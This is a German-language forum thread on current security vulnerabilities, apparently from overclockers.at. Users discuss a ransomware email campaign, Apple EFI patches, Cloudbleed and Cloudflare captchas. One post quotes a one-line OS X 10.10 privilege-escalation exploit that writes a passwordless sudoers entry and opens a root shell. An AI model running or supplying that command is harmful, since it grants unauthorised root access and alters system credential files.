"Christmas - the time to fix the computers of your loved ones" « Lord Wyrm

Aktuelle Sicherheitslücken

Hansmaulwurf 20.04.2014 - 11:17 54082 157
Posts

mr.nice.

Newsposter
OC Addicted
Avatar
Registered: Jun 2004
Location: Wien
Posts: 4406
Momentan ist verstärkt im deutschsprachigen Raum ein Ransomware Trojaner im Umlauf dessen Erkennungsrate noch relativ niedrig ist, meist als Email-Attachment getarnt:

https://www.virustotal.com/de/file/...b76e8/analysis/

noir

Overclocking Team Member
Avatar
Registered: Dec 2007
Location: Salzburg/OÖ
Posts: 2185
naja
Ausgleich von Inkassoabteilung --> hääääää
sowas landet bei mir sowieso sofort im Kübel
wenn es überhaupt durch den Spamfilter durchgeht

mr.nice.

Newsposter
OC Addicted
Avatar
Registered: Jun 2004
Location: Wien
Posts: 4406
Apple EFI-Update schließt Sicherheitslücken CVE-2015-3692, CVE-2015-3693:

https://support.apple.com/de-de/HT204934

Luka

Administrator
...
Avatar
Registered: Nov 2006
Location: Mödling
Posts: 205

So einfach bekommt man Root-Rechte auf OS X 10.10:

Zitat
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Quelle: numinit auf reddit.com

Luka

Administrator
...
Avatar
Registered: Nov 2006
Location: Mödling
Posts: 205

wergor

fantasiebefreit
Avatar
Registered: Jul 2005
Location: graz
Posts: 3058

Lord Wyrm

wastelandwarrior
Avatar
Registered: Jan 2005
Location: Amstetten
Posts: 1169
Cloudbleed




Wiedermal Zeit für nen Passwortwechsel...

Rektal

OC Addicted
Registered: Dec 2002
Location: Inside
Posts: 4186
Zitat
Cloudbleed

Das ist wirklich einer der besten Internet-Bugs seit langem:
- zentral genutzes Service
- broken html parsing gepaart mit buffer overrun/memory leak
- leaks private information on random unrelated requests
- gets data cached on the internets (google, etc.)

Perfekt, besser gehts nicht :bash:

COLOSSUS

"Hi!"
Avatar
Registered: Dec 2000
Location: Wien || Stmk
Posts: 10762
¯\_(ツ)_/¯

Obermotz

Fünfzylindernazi
Avatar
Registered: Nov 2002
Location: OÖ/GR
Posts: 4561
Die gehn ma eh schon lange aufn Sack mit ihren deppterten DDOS ReCaptcha Abfragen wenn ich via VPN unterwegs bin..

Smut

takeover & ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 14793
in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten :p
hat schon einen grund weshalb das kommt.

ja, bitter. incident response machen sie dennoch vorbildlich.

Obermotz

Fünfzylindernazi
Avatar
Registered: Nov 2002
Location: OÖ/GR
Posts: 4561
Naja viele Anbieter sind mittlerweile gelistet. Hab eh schon einige durch ;)

wergor

fantasiebefreit
Avatar
Registered: Jul 2005
Location: graz
Posts: 3058
Zitat von Smut
in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten :p
hat schon einen grund weshalb das kommt.
mit tor gibts auch ständig captcha abfragen. nervt leider :(

Zitat von Smut
ja, bitter. incident response machen sie dennoch vorbildlich.
true, der report ist auch sehr interessant zu lesen, auch wenn man (wie ich) mit nginx und ragel nix am hut hat.

edit: der einzige für mich relevante anbeiter den ich bis jetzt gefunden habe ist humblebundle.com :/

Smut

takeover & ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 14793
das problem dabei ist halt, dass der website-provider genau diesen schutz vor anonymen angreifern will, wenn er seine seite hinter cloudflare bringt. hat jetzt wenig damit zu tun, dass du VPN verwendest sondern, dass von diesen adressen (auch tor exit nodes) vermehrt automatisierte attacken auf das cloudflare CDN losgehen. und um diese automatismen zu unterbinden haben sie captchas.

wergor

fantasiebefreit
Avatar
Registered: Jul 2005
Location: graz
Posts: 3058
das ist mir schon klar. nervt aber trotzdem ;)
Kontakt | Unser Forum | Über overclockers.at | Impressum | Datenschutz